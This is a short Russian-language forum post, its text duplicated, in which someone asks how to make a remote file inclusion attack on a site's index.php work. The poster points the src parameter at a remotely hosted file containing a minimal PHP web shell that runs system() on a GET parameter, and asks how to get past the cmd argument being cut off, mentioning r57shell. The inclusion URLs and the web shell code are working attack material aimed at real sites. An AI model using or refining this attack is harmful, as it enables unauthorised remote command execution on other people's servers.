короче есть стандартная инклюда
https://xxx.com/index.php?src=http://durito.narod.ru/sh.html
открывает исходный код sh.html:
проблема в том, что скрипт index.php отсекает все команды после sh.html
поэтому выполнить их невозможно.
при запросе https://xxx.com/index.php?src=http://durito.../sh.html?cmd=ls
опять выдает исходный код
как это обойти? помню было что-то подобное у чела, там инклудился r57shell и команды выполнялись без проблем
https://xxx.com/index.php?src=http://durito.narod.ru/sh.html
открывает исходный код sh.html:
<?
echo "<DIV align=left><PRE>";
system($_GET['cmd']);
echo "</PRE></DIV>";
?>
проблема в том, что скрипт index.php отсекает все команды после sh.html
поэтому выполнить их невозможно.
при запросе https://xxx.com/index.php?src=http://durito.../sh.html?cmd=ls
опять выдает исходный код
как это обойти? помню было что-то подобное у чела, там инклудился r57shell и команды выполнялись без проблем